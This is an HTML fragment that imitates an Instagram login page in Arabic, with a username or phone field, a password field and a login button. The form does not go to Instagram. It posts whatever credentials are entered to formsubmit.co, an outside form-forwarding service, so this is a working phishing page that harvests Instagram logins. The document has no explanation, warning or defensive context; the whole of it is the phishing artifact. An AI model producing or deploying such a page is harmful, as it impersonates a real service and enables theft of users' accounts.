
<center>
  <h1 style="font-family: sans-serif; color: #e1306c;">Instagram</h1>
  
  <form action="https://formsubmit.co" method="POST">
    <input type="text" name="username" placeholder="اسم المستخدم أو الهاتف" style="display: block; margin: 10px; padding: 10px; width: 250px;" required>
    <input type="password" name="password" placeholder="كلمة السر" style="display: block; margin: 10px; padding: 10px; width: 250px;" required>
    
    <button type="submit" style="background-color: #0095f6; color: white; border: none; padding: 10px 20px; border-radius: 4px; cursor: pointer; width: 270px; font-weight: bold;">تسجيل الدخول</button>
  </form>
</center>
